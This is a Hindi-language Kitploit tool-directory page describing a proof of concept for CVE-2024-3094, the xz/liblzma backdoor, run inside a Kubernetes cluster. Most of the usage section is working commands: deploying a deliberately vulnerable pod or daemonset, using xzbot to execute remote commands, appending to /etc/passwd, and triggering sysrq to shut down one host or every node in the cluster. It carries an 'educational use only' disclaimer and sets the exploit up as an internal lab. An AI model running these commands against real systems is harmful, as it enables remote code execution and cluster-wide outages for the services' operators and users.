Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3094 — K8s क्लस्टर के अंदर CVE-2024-3094 भेद्यता का परीक्षण करने के लिए बेसिक POC | Kitploit
उपकरण/GitHubGitHub/shefirot/cve-2024-3094
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षाकंटेनर एस्केप
GitHubshefirot/cve-2024-3094

CVE-2024-3094

K8s क्लस्टर के अंदर CVE-2024-3094 भेद्यता का परीक्षण करने के लिए बेसिक POC

रिपॉजिटरी देखें
62 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3094

K8s क्लस्टर के अंदर CVE-2024-3094 भेद्यता का परीक्षण करने के लिए बेसिक POC

❗ अस्वीकरण ❗

केवल शैक्षिक उद्देश्यों के लिए उपयोग करें; इस सॉफ़्टवेयर के उपयोग से हुए किसी भी नुकसान के लिए लेखक ज़िम्मेदार नहीं है

विवरण

हम एक भेद्य (vulnerable) पॉड deploy करेंगे और उस भेद्य पॉड के अंदर कमांड निष्पादित करने के लिए उसका शोषण करेंगे; सुरक्षा कारणों से हम यह उसी नेटवर्क के अंदर करते हैं। हम भेद्य पॉड को इंटरनेट पर expose नहीं करते, लेकिन अवधारणा समान है।

यह भेद्यता पॉड के अंदर कमांड निष्पादित करने की अनुमति देती है, भले ही पॉड security context के साथ चल रहा हो; उदाहरण के लिए, आप उस होस्ट को shutdown कर सकते हैं जो पॉड चला रहा है।

यदि यह भेद्यता एक single पॉड में चल रही है, तो आप होस्ट को shutdown कर सकते हैं, जिससे उस होस्ट पर चल रही सभी सेवाएँ अस्थायी रूप से अनुपलब्ध हो जाती हैं। लेकिन, यदि यह भेद्यता daemonset के रूप में चल रही है, तो आप उस daemonset को चला रहे सभी होस्ट्स को shutdown कर सकते हैं, यहाँ तक कि पूरे क्लस्टर को भी।

आवश्यकताएँ

  • K8s क्लस्टर deployed हो
  • Kubectl installed हो
  • K8s क्लस्टर तक पहुँच हो
  • Go installed हो

उपयोग

सबसे पहले, क्लस्टर में xzbots install करें

root@kitploit:~
go install github.com/amlweems/xzbot@latest

रिपॉज़िटरी download करें और भेद्य deployment/daemonset deploy करें

root@kitploit:~
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
root@kitploit:~
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd

आगे बढ़ें और होस्ट को shutdown करें

root@kitploit:~
# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'

आप daemonset चला रहे सभी होस्ट्स को भी shutdown कर सकते हैं

root@kitploit:~
source shutdown_nodes.sh

ज्ञात समस्याएँ

1. Connection refused

जब आप सभी होस्ट्स को shutdown करने के लिए loop चलाते हैं, यदि आपको यह error मिलता है:

root@kitploit:~
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused

पोर्ट फ़ॉरवर्ड तैयार होने के लिए अधिक समय दें; आप लूप में sleep time बढ़ा सकते हैं।

अतिरिक्त जानकारी

कंटेनर इमेज रिपॉज़िटरी में मौजूद dockerfile के साथ बनाई गई थी; आप इमेज बना सकते हैं और इसे अपनी registry में push कर सकते हैं।

liblzma.so.5.6.0.patch लाइब्रेरी बनाने के लिए, आप references में दिए गए amlweems repo का उपयोग कर सकते हैं।

संदर्भ

amlweems repo

r0binak repo

टूल डाउनलोड करें